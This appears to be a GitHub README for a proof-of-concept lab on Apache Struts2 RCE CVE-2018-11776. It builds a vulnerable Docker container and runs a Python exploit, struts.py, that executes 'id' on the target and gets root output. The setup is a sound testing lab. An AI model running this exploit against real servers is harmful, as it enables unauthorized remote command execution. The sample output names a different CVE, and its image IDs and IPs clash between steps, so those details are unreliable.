This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions did not work as described in the README so this fork was created. The POC exploit used is from Rapid7.
Shoutout:
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Rapid7 rapid7/metasploit-framework#8064
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
Default configuration is not vulnerable. This container, and many others, are vulnerable.
It's preferrable to build a container from a Dockerfile when you can see what is going into the build.
git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
cd Struts
docker build . -t freshdemo/apachestruts
Find the new container with
docker images
The output should be similar to this, where you can get the image ID.
root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images REPOSITORY TAG IMAGE ID CREATED SIZE
freshdemo/apachestruts latest 6586cedf49fa About a minute ago 542MB
Build and start a container with the following.
docker run -d --name apachestruts -p 8080:8080 d39018c50afe
Make sure any ingress/egress firewalls permit the port you specified earlier (8080), and run the exploit against your target with the following.
python struts.py http://192.168.2.188:8080 'id'
Your output should be similar to this.
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id' [*] CVE: 2017-5638 - Apache Struts2 S2-045 http://13.88.250.188:8080 : [*] cmd: id uid=0(root) gid=0(root) groups=0(root)